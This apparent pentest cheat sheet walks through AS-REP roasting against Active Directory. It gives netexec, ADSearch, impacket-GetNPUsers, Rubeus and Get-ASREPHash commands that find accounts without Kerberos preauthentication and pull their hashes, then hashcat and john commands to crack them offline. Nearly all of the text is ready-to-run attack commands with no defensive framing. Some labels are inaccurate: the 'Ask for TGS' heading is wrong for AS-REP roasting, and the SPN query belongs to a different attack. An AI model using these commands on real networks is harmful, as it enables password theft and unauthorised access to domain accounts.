Tags
KerberosUnauthenticatedInitial Access
Identify
nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
Exploit
Ask for TGS
nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
impacket-GetNPUsers domain.local/svc-test -no-pass
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Get-ASREPHash -Username svc-test -verbose
Crack ticket
hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt